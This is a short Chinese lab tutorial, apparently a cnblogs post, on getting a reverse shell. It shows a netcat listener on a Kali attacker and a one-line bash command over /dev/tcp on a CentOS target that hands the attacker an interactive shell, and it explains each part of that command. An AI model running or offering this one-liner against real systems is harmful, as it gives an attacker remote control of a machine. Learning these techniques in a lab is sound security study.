关闭页面特效

反弹Shell小实验

1|0反弹Shell


1|1实验环境


攻击机:kali (IP:192.168.40.132)

目标机:CentOS (IP:192.168.40.135)

1|2实验步骤


首先在攻击机监听一个随机端口:

nc -lvp 6767

第二步在目标机输入命令:

bash -i > /dev/tcp/192.168.40.132/6767 0>&1 2>&1

这时候攻击机终端出现交互式bash

在攻击机终端输入命令cat /etc/os-release可以看到目标机操作系统相关信息

这时候表明我们已经成功执行了反弹Shell,接下来就可以get shell了

1|3解释


  • nc -lvp 6767

    ncnetcat的缩写,可以实现任意TCP/UDP端口的侦听, nc可以作为server以TCP或UDP方式侦听指定端口。 -l 监听,-v 输出交互或出错信息,-p 端口 。

命令 解释
bash -i 产生一个交互式shell(bash)
/dev/tcp/ip/port 建立TCP连接,特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
0>&1 将标准输入、标准输出、错误输出全都重定向到攻击端

__EOF__

作  者WeberBon
出  处https://www.cnblogs.com/Weber-security/p/16754552.html
关于博主:185猛男
版权声明:署名 - 非商业性使用 - 禁止演绎,协议普通文本 | 协议法律文本
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!

posted @   Weber·Bon  阅读(79)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
0
0
关注
跳至底部
点击右上角即可分享
微信分享提示